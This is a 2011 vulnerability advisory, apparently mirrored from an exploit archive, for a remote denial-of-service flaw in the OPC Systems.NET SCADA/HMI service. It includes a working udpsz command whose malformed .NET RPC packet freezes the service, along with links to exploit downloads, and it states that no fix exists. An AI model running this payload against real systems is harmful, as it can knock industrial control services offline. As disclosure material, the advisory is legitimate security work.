OPC Systems.NET <= 4.00.0048 Denial of Service
| EKU-ID: 1121 | CVE: | OSVDB-ID: |
| Author: Luigi Auriemma | Published: 2011-10-11 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 1121 | CVE: | OSVDB-ID: |
| Author: Luigi Auriemma | Published: 2011-10-11 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
#######################################################################
Luigi Auriemma
Application: OPC Systems.NET
http://www.opcsystems.com/opc_systems_net.htm
Versions: <= 4.00.0048
Platforms: Windows
Bug: Denial of Service
Exploitation: remote
Date: 10 Oct 2011
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's website:
"As a Service Oriented Architecture the OPC Systems Service can connect
to data from OPC Servers, OPC Clients, Visual Studio Applications,
Microsoft Excel, and databases ... breakthrough .NET products for
SCADA, HMI, and plant floor to business solutions to shorten your
development to deployment time."
#######################################################################
======
2) Bug
======
OPCSystemsService.exe can be freezed with CPU at 100% through a
malformed .NET RPC packet.
No additional research performed.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
http://www.exploit-db.com/sploits/17965.zip
udpsz -l 2000 -c ".NET\1\0\0\0\0\0\xff\xff\xff\xff\4\0\1\1\x25\0\0\0tcp://127.0.0.1/OPC Systems Interface\6\0\1\1" -T SERVER 58723 0x80
#######################################################################
======
4) Fix
======
No fix.
#######################################################################